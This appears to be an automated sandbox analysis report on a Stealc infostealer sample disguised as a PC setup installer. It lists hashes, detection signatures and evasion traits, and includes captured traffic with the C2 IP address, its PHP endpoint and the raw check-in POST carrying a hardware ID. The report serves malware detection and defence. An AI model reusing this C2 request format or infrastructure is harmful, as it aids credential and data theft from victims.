Windows Analysis Report
Full_PC_Set-Up.exe

Overview

General Information

Sample name: Full_PC_Set-Up.exe
Analysis ID: 1525664
MD5: 7400e305a002a18fbec6a6d189ef6879
SHA1: 04138fb49978d5005bd5e9be7c958227131d8437
SHA256: 32df795e1539a4c4adce359c6fcc9be616db4591937072197171c6c5c465297e
Tags: exeuser-aachum
Infos:

Detection

Stealc
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0030D910 CreateFileW,CreateFileW,GetLastError,GetLastError,swprintf,CreateFileW,GetLastError,__wsplitpath,CloseHandle,CreateFileW,GetLastError,CloseHandle,CloseHandle,ReadFile,ReadFile,WriteFile,ReadFile,WriteFile,WriteFile,ReadFile,WriteFile,WriteFile,CloseHandle,CloseHandle,OpenEncryptedFileRawW,SetFilePointer,WriteEncryptedFileRaw,CloseEncryptedFileRaw,CloseHandle,DeleteFileW,GetLastError,CloseHandle, 0_2_0030D910
Uses 32bit PE files
Source: Full_PC_Set-Up.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 0_2_00374078
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, 0_2_002CCA90

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 45.200.148.115:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD--
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: unknown TCP traffic detected without corresponding DNS query: 45.200.148.115
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.115Connection: Keep-AliveCache-Control: no-cache
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe, 00000000.00000000.1798820680.00000000004DA000.00000002.00000001.01000000.00000003.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1876438795.00000000004DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: K*7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{U@ equals www.twitter.com (Twitter)
Source: Full_PC_Set-Up.exe String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.facebook.com (Facebook)
Source: Full_PC_Set-Up.exe String found in binary or memory: KA7-Data%d.%dSOFTWARE\EDRFreeRestoredSize\7drs.iniUrlIndexBuy\unins000.exehttp://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://7datarecoverysoftware.com/buy/7drs-ptb.phphttp://7datarecoverysoftware.com/?ref=apphttp://7datarecoverysoftware.com/support/?ref=apphttp://7datarecoverysoftware.com/update/http://www.facebook.com/pages/7-Data-Recovery-Software/145405585627896https://twitter.com/7Datahttp://7datarecoverysoftware.com/news/suite.xmlsupport@7datarecoverysoftware.com7datarecovery supportH{l@ equals www.twitter.com (Twitter)
Source: unknown HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 45.200.148.115Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 35 44 35 45 36 32 46 45 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="hwid"865D5E62FEE5845770397------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build"b6------JDGCGDBGCAAEBFIECGHD--
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.php2
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpM
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpS
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.200.148.115/0a616124ff2f2b69.phpq
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/7dptr-order/?ref=apphttp://7datarecoverysoftware.comhttp://7datarec
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/buy/7drs-st.phphttp://7datarecoverysoftware.com/buy/7drs.phphttp://
Source: Full_PC_Set-Up.exe String found in binary or memory: http://7datarecoverysoftware.com/enable-usb-debugging/http://7datarecoverysoftware.com/usb-connect-a
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia.startssl.com/certs/ca.crt02
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2-code3.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2-ts.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca1g2.ts.cer0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://aia1.wosign.com/ca6.code3.cer06
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crl.startssl.com/sfsca.crl0
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1.crl0h
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1.crl0k
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca1g2-ts.crl0m
Source: Full_PC_Set-Up.exe String found in binary or memory: http://crls1.wosign.com/ca6-code3.crl0P
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp.startssl.com/ca00
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca10/
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca102
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca1g2/ts0/
Source: Full_PC_Set-Up.exe String found in binary or memory: http://ocsp1.wosign.com/ca6/code300
Source: Full_PC_Set-Up.exe String found in binary or memory: http://www.kungsoft.com
Source: Full_PC_Set-Up.exe String found in binary or memory: http://www.wosign.com/policy/0
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004B6680: _memset,DeviceIoControl, 0_2_004B6680
Detected potential crypto function
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038E41F 0_2_0038E41F
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D97B 0_2_0038D97B
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002BA050 0_2_002BA050
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DA0C0 0_2_002DA0C0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003960CB 0_2_003960CB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00484130 0_2_00484130
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004AC1A9 0_2_004AC1A9
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003601D0 0_2_003601D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004042B0 0_2_004042B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00324370 0_2_00324370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039E486 0_2_0039E486
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039C75A 0_2_0039C75A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00366A4A 0_2_00366A4A
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00404AB0 0_2_00404AB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0048EBD0 0_2_0048EBD0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00372CFB 0_2_00372CFB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038ED0D 0_2_0038ED0D
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0040ED80 0_2_0040ED80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D4E30 0_2_003D4E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002F2E30 0_2_002F2E30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003F8F30 0_2_003F8F30
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039EF0E 0_2_0039EF0E
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002C8FB0 0_2_002C8FB0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002F7030 0_2_002F7030
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00305140 0_2_00305140
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00321200 0_2_00321200
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00323370 0_2_00323370
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0040F3B0 0_2_0040F3B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003853CA 0_2_003853CA
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D4D0 0_2_0038D4D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D5DD 0_2_0038D5DD
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_004016E0 0_2_004016E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DB6E0 0_2_002DB6E0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00403710 0_2_00403710
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D7B5 0_2_0038D7B5
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002B3800 0_2_002B3800
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0030F870 0_2_0030F870
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038D8B2 0_2_0038D8B2
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003399B0 0_2_003399B0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00407A20 0_2_00407A20
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0048DB70 0_2_0048DB70
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00391BAB 0_2_00391BAB
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D5B80 0_2_003D5B80
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00403D30 0_2_00403D30
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00383725 appears 37 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 0040E430 appears 123 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00388CFC appears 45 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 0040E370 appears 60 times
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: String function: 00388BEF appears 49 times
PE / OLE file has an invalid certificate
Source: Full_PC_Set-Up.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: Full_PC_Set-Up.exe Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Uses 32bit PE files
Source: Full_PC_Set-Up.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Full_PC_Set-Up.exe Binary string: B\Device\HarddiskDmVolumes\%c:IOCTL_DISK_GET_DRIVE_LAYOUT_EX GetLastError %dIOCTL_DISK_GET_DRIVE_LAYOUT GetLastError %d\Device\Harddisk%u\Partition%u\\.\MountPointManager\DosDevices\\??\Volume{IOCTL_MOUNTMGR_QUERY_POINTS GetLastError %dKernel32.dllGetVolumePathNamesForVolumeNameW\\?\Volume{%s%02x%02x%02x%02x-%02x%02x-%02x%02x-}\%02x%02x-%02x%02x%02x%02x%02x%02x%sbatch_read_sector start %I64d, count: %I64dni(%d) > c_block_count
Source: classification engine Classification label: mal76.troj.expl.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CC8D0 GetDiskFreeSpaceExW, 0_2_002CC8D0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002ECA70 GetWindowRect,CoCreateInstance,SendMessageW,SendMessageW,SendMessageW, 0_2_002ECA70
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0036A09D __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource, 0_2_0036A09D
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AR7OIXQT.htm Jump to behavior
Source: Full_PC_Set-Up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Full_PC_Set-Up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Full_PC_Set-Up.exe Static file information: File size 7230768 > 1048576
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x248800
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14fa00
Source: Full_PC_Set-Up.exe Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x298a00
Source: Full_PC_Set-Up.exe Static PE information: More than 200 imports for USER32.dll
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Full_PC_Set-Up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Full_PC_Set-Up.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\edr\bin\Release\7DataPartitionRecovery.pdb source: Full_PC_Set-Up.exe
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Full_PC_Set-Up.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, 0_2_00298550
PE file contains an invalid checksum
Source: Full_PC_Set-Up.exe Static PE information: real checksum: 0x48470d should be: 0x6f0441
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00388CC7 push ecx; ret 0_2_00388CDA
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00388D41 push ecx; ret 0_2_00388D54

Malware Analysis System Evasion
barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0029A370 GetSystemDefaultLangID, push 00000419h 0_2_0029A370
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe API coverage: 0.1 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00374078 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 0_2_00374078
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002CCA90 _memset,_memset,_memset,GetLogicalDrives,GetDriveTypeW,GetVolumeInformationW,GetLastError,CreateFileW,CloseHandle,DeleteFileW,FindFirstFileW,FindClose,CreateFileW,CloseHandle, 0_2_002CCA90
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Full_PC_Set-Up.exe, 00000000.00000002.1877669838.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Full_PC_Set-Up.exe, 00000000.00000002.1877669838.000000000102F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003812A6
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00298550 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetObjectW, 0_2_00298550
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0039FBF7 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_0039FBF7
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
